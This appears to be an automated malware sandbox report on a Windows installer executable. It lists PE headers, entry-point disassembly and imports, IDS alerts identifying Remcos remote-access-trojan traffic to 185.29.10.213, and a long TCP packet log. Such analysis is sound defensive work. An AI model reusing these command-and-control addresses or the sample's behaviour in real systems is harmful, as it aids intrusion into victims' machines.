Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x64A0DC63 [Sun Jul 2 02:09:39 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f4639a0b3116c2cfc71144b88a929cfd
Instruction (disassembly at entrypoint 0x4034fc):
sub esp, 000003F8h
push ebp
push esi
push edi
push 00000020h
pop edi
xor ebp, ebp
push 00008001h
mov dword ptr [esp+20h], ebp
mov dword ptr [esp+18h], 0040A2D8h
mov dword ptr [esp+14h], ebp
call dword ptr [004080A4h]
mov esi, dword ptr [004080A8h]
lea eax, dword ptr [esp+34h]
push eax
mov dword ptr [esp+4Ch], ebp
mov dword ptr [esp+0000014Ch], ebp
mov dword ptr [esp+00000150h], ebp
mov dword ptr [esp+38h], 0000011Ch
call esi
test eax, eax
jne 00007F434D4C24AAh
lea eax, dword ptr [esp+34h]
mov dword ptr [esp+34h], 00000114h
push eax
call esi
mov ax, word ptr [esp+48h]
mov ecx, dword ptr [esp+62h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [esp+0000014Eh], 00000004h
not eax
and eax, ecx
mov word ptr [esp+00000148h], ax
cmp dword ptr [esp+38h], 0Ah
jnc 00007F434D4C2478h
and word ptr [esp+42h], 0000h
mov eax, dword ptr [esp+40h]
movzx ecx, byte ptr [esp+3Ch]
mov dword ptr [00429AD8h], eax
xor eax, eax
mov ah, byte ptr [esp+38h]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [esp+00000148h]
movzx ecx, cx
shl eax, 10h
or eax, ecx
movzx ecx, byte ptr [esp+0000004Eh]
Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x84fc | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x46000 | 0x390b8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2a8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6556 | 0x6600 | dd25e171f2e0fe45f2800cc9e162537d | False | 0.6652113970588235 | data | 6.456753840355455 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1358 | 0x1400 | f0b500ff912dda10f31f36da3efc8a1e | False | 0.44296875 | data | 5.102094016108248 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x1fb38 | 0x600 | 2bc02714ee74ba781d92e94eeaccb080 | False | 0.501953125 | data | 4.040639308682379 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x2a000 | 0x1c000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x46000 | 0x390b8 | 0x39200 | 772060f74dab690e6f9abb0f3fe28070 | False | 0.5548199876914661 | data | 5.976433760999894 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x46388 | 0x10ba2 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9963657062790087
RT_ICON | 0x56f30 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.34064829054773454
RT_ICON | 0x67758 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.3811751103636746
RT_ICON | 0x70c00 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.39269870609981516
RT_ICON | 0x76088 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.39100141709966935
RT_ICON | 0x7a2b0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.44066390041493775
RT_ICON | 0x7c858 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.47068480300187615
RT_ICON | 0x7d900 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.5311475409836065
RT_ICON | 0x7e288 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.5948581560283688
RT_DIALOG | 0x7e6f0 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x7e7f0 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x7e910 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x7e9d8 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x7ea38 | 0x84 | Targa image data - Map 32 x 2978 x 1 +1 | English | United States | 0.7348484848484849
RT_VERSION | 0x7eac0 | 0x2b4 | data | English | United States | 0.48988439306358383
RT_MANIFEST | 0x7ed78 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
DLL | Import
ADVAPI32.dll | RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
SHELL32.dll | SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
ole32.dll | CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
COMCTL32.dll | ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll | MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
GDI32.dll | GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
KERNEL32.dll | lstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW
Language of compilation system | Country where language is spoken | Map
English | United States | (map image not included)
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-04T06:37:09.081442+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.5 | 49807 | 104.21.13.139 | 443 | TCP
2024-12-04T06:37:15.606210+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.5 | 49825 | 185.29.10.213 | 63650 | TCP
2024-12-04T06:37:18.211477+0100 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.5 | 49835 | 178.237.33.50 | 80 | TCP
2024-12-04T06:37:20.590561+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.5 | 49840 | 185.29.10.213 | 63650 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 4, 2024 06:37:06.844115019 CET | 49807 | 443 | 192.168.2.5 | 104.21.13.139
Dec 4, 2024 06:37:06.844160080 CET | 443 | 49807 | 104.21.13.139 | 192.168.2.5
Dec 4, 2024 06:37:06.844230890 CET | 49807 | 443 | 192.168.2.5 | 104.21.13.139
Dec 4, 2024 06:37:06.854728937 CET | 49807 | 443 | 192.168.2.5 | 104.21.13.139
Dec 4, 2024 06:37:06.854742050 CET | 443 | 49807 | 104.21.13.139 | 192.168.2.5
Dec 4, 2024 06:37:08.162558079 CET | 443 | 49807 | 104.21.13.139 | 192.168.2.5
Dec 4, 2024 06:37:08.162728071 CET | 49807 | 443 | 192.168.2.5 | 104.21.13.139
Dec 4, 2024 06:37:08.206005096 CET | 49807 | 443 | 192.168.2.5 | 104.21.13.139
Dec 4, 2024 06:37:08.206042051 CET | 443 | 49807 | 104.21.13.139 | 192.168.2.5
Dec 4, 2024 06:37:08.206347942 CET | 443 | 49807 | 104.21.13.139 | 192.168.2.5
Dec 4, 2024 06:37:08.209537029 CET | 49807 | 443 | 192.168.2.5 | 104.21.13.139
Dec 4, 2024 06:37:08.211353064 CET | 49807 | 443 | 192.168.2.5 | 104.21.13.139
Dec 4, 2024 06:37:08.259341002 CET | 443 | 49807 | 104.21.13.139 | 192.168.2.5
Dec 4, 2024 06:37:09.081459999 CET | 443 | 49807 | 104.21.13.139 | 192.168.2.5
Dec 4, 2024 06:37:09.081581116 CET | 443 | 49807 | 104.21.13.139 | 192.168.2.5
Dec 4, 2024 06:37:09.081650019 CET | 49807 | 443 | 192.168.2.5 | 104.21.13.139
Dec 4, 2024 06:37:09.081721067 CET | 49807 | 443 | 192.168.2.5 | 104.21.13.139
Dec 4, 2024 06:37:09.093781948 CET | 49807 | 443 | 192.168.2.5 | 104.21.13.139
Dec 4, 2024 06:37:09.093801022 CET | 443 | 49807 | 104.21.13.139 | 192.168.2.5
Dec 4, 2024 06:37:09.250875950 CET | 49813 | 443 | 192.168.2.5 | 104.21.13.139
Dec 4, 2024 06:37:09.250976086 CET | 443 | 49813 | 104.21.13.139 | 192.168.2.5
Dec 4, 2024 06:37:09.251065016 CET | 49813 | 443 | 192.168.2.5 | 104.21.13.139
Dec 4, 2024 06:37:09.251348972 CET | 49813 | 443 | 192.168.2.5 | 104.21.13.139
Dec 4, 2024 06:37:09.251379013 CET | 443 | 49813 | 104.21.13.139 | 192.168.2.5
Dec 4, 2024 06:37:10.507937908 CET | 443 | 49813 | 104.21.13.139 | 192.168.2.5
Dec 4, 2024 06:37:10.508142948 CET | 49813 | 443 | 192.168.2.5 | 104.21.13.139
Dec 4, 2024 06:37:10.511358023 CET | 49813 | 443 | 192.168.2.5 | 104.21.13.139
Dec 4, 2024 06:37:10.511379957 CET | 443 | 49813 | 104.21.13.139 | 192.168.2.5
Dec 4, 2024 06:37:10.511614084 CET | 443 | 49813 | 104.21.13.139 | 192.168.2.5
Dec 4, 2024 06:37:10.511683941 CET | 49813 | 443 | 192.168.2.5 | 104.21.13.139
Dec 4, 2024 06:37:10.511981964 CET | 49813 | 443 | 192.168.2.5 | 104.21.13.139
Dec 4, 2024 06:37:10.559333086 CET | 443 | 49813 | 104.21.13.139 | 192.168.2.5
Dec 4, 2024 06:37:11.615360975 CET | 443 | 49813 | 104.21.13.139 | 192.168.2.5
Dec 4, 2024 06:37:11.615413904 CET | 443 | 49813 | 104.21.13.139 | 192.168.2.5
Dec 4, 2024 06:37:11.615430117 CET | 49813 | 443 | 192.168.2.5 | 104.21.13.139
Dec 4, 2024 06:37:11.615464926 CET | 443 | 49813 | 104.21.13.139 | 192.168.2.5
Dec 4, 2024 06:37:11.615474939 CET | 443 | 49813 | 104.21.13.139 | 192.168.2.5
Dec 4, 2024 06:37:11.615483046 CET | 49813 | 443 | 192.168.2.5 | 104.21.13.139
Dec 4, 2024 06:37:11.615523100 CET | 49813 | 443 | 192.168.2.5 | 104.21.13.139
Dec 4, 2024 06:37:11.615523100 CET | 49813 | 443 | 192.168.2.5 | 104.21.13.139
Dec 4, 2024 06:37:11.615534067 CET | 443 | 49813 | 104.21.13.139 | 192.168.2.5
Dec 4, 2024 06:37:11.615545034 CET | 443 | 49813 | 104.21.13.139 | 192.168.2.5
Dec 4, 2024 06:37:11.615581989 CET | 49813 | 443 | 192.168.2.5 | 104.21.13.139
Dec 4, 2024 06:37:11.615607023 CET | 49813 | 443 | 192.168.2.5 | 104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.615983009 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.616044044 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.624273062 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.624330044 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.624408960 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.624463081 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.632709026 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.632766008 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.632838011 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.632884979 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.735269070 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.735377073 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.735409021 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.735507011 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.816715002 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.816777945 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.820272923 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.820323944 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.820384026 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.820430040 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.827739000 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.827811003 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.827862978 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.827914000 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.836680889 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.836730003 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.836841106 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.836884975 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.844105005 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.844150066 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.851577997 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.851636887 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.851656914 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.851703882 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.857331038 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.857383966 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.857398033 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.857414961 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.857445955 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.857465029 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.864725113 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.864783049 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.864857912 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.864905119 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.873725891 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.873797894 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.873811960 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.873855114 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.880673885 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.880742073 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.880847931 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.880897999 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.887824059 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.887887955 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.894651890 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.894717932 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.894819021 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.894860983 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.901798964 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.901870966 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.901936054 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.901983976 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.907210112 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.907299042 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.018013954 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.018079042 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.018115044 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.018172026 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.020265102 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.020323992 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.020390987 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.020441055 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.029813051 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.029874086 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.038711071 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.038779974 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.047349930 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.047445059 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.051681042 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.051743031 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.060306072 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.060374022 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.068800926 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.068861008 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.073211908 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.073277950 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.081736088 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.081799984 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.090295076 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.090361118 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.094701052 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.094765902 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.103250980 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.103348017 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.111804008 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.111865997 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.219212055 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.219284058 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.223484993 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.223548889 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.226977110 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.227039099 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.233457088 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.233530045 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.239900112 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.239964962 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.243160009 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.243216038 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.249115944 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.249181032 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.255209923 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.255269051 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.258379936 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.258445024 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.264453888 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.264519930 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.270456076 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.270520926 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.273606062 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.273669004 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.279726028 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.279788971 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.285691023 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.285756111 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.288850069 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.289052963 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.293382883 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.293447018 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.299463034 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.299527884 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.305618048 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.305737972 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.311574936 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.311631918 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.314663887 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.314732075 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.320813894 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.320878983 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.326847076 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.326916933 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.330039978 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.330092907 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.335928917 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.335998058 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.420592070 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.420669079 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.423908949 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.424006939 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.426388979 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.426460981 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.431070089 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.431147099 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.442138910 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.442148924 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.442187071 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.442235947 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.442276955 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.442310095 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.442332029 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.456763029 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.456780910 CET44349813104.21.13.139192.168.2.5
